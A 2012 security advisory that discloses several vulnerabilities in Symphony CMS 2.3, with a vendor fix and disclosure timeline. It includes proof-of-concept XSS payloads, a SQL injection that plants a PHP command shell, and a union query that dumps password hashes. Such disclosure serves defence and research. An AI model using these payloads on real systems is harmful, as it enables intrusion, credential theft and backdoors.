Symphony CMS 2.3 - Multiple Vulnerabilities

EDB-ID:

22039

CVE:





Platform:

PHP

Date:

2012-10-17


Symphony cms 2.3 multiple vulnerabilities

--------------------------------------------------------------------------------------------
20121017 - Justanotherhacker.com : Symphony cms - Multiple vulnerabilities
JAHx122 - http://www.justanotherhacker.com/advisories/JAHx122.txt
--------------------------------------------------------------------------------------------

Symphony is an XSLT-powered open source content management system.
[ Taken from: http://getsymphony.com/ ]


--- Vulnerability description ---
Symphony-cms version 2.3 is vulnerable to several vulnerabilities ranging in
severity from low to high and can result in complete compromise by an
unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony - http://getsymphony.com
Affected versions: 2.3 (and possibly earlier)

--- Local patch disclosure ---
Direct requests to library files will disclose the full local file path if php is configured
to display errors due to the reliance on the library path being declared in a constant 
of global scope outside of the library script.

PoC:
http://host/path/symphony/lib/boot/bundle.php

--- User enumeration ---
The retrive password url http://host/path/symphony/login/retrieve-password/ will display a 
helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table an attacker can login to 
their account by brute forcing a key of [0-9A-F]^8 length.

The url http://host/path/symphony/login/[token]/ ie: http://host/path/symphony/login/a39880be/ 
for the user "admin" with password "admin".


--- Cross site scripting ---
Reflected:
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not 
sufficiently filtered for malicious characters resulting in reflected cross site scripting.

PoC:
Submit form with email address:
"><script>alert(1)</script>

Reflected:
The email input field supplied to http://host/path/symphony/login/ is not sufficiently 
filtered for malicious characters resulting in reflected cross site scripting.

PoC:
username=%22%3E%3C%2Finput%3E%3Cscript%3Ealert%28%27k63ddgb6ra%27%29%3C%2Fscript%3E&password=on

Persistent:
The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) 
is not sufficiently encoded resulting in persistent cross site scripting.

PoC:
settings%5Bemail_sendmail%5D%5Bfrom_name%5D=Symphony%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

--- Blind sql injection ---
The username field in the authors detail page is not sufficiently filtered when checking
is the username already exists in the system. Resulting in blind sql injection.

PoC:
Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure. 

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a users username, hashed password and auth token status with the following PoC:
http://host/path/symphony/bluePRINTs/pages/edit/0%29+union+select+1,2,username,password,5,auth_token_active,7,8,9+from+sym_authors+where+id+=+1+--+/

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined 
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email